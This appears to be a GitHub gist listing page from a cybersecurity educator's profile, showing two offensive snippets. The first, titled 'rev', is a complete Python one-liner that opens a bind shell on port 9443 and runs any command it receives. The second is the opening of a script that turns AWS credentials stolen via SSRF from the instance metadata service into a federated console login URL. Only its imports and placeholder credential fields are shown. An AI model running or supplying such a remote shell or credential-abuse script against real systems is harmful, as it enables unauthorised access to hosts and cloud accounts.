Skip to content

Instantly share code, notes, and snippets.

View carlosevieira's full-sized avatar
🔄
Building an amazing cybersecurity education platform

Carlos Vieira carlosevieira

🔄
Building an amazing cybersecurity education platform
218 followers · 44 following
View GitHub Profile
@carlosevieira
carlosevieira / gist:950635827be7c37547d6c5e5f4903fa7
Last active November 28, 2022 01:47
rev
python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",9443));s1.listen(1);c,a=s1.accept();
while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
@carlosevieira
carlosevieira / console-via-role.py
Created November 20, 2022 12:13
This script generates a federated URL using the credentials obtained via SSRF in the AWS metadata to access the console on AWS
import requests
import datetime
import json
import urllib
session_data = {
'sessionId': '[AWS_ACCESS_KEY_ID]',
'sessionKey': '[AWS_SECRET_ACCESS_KEY]',
'sessionToken': '[AWS_SESSION_TOKEN]'
}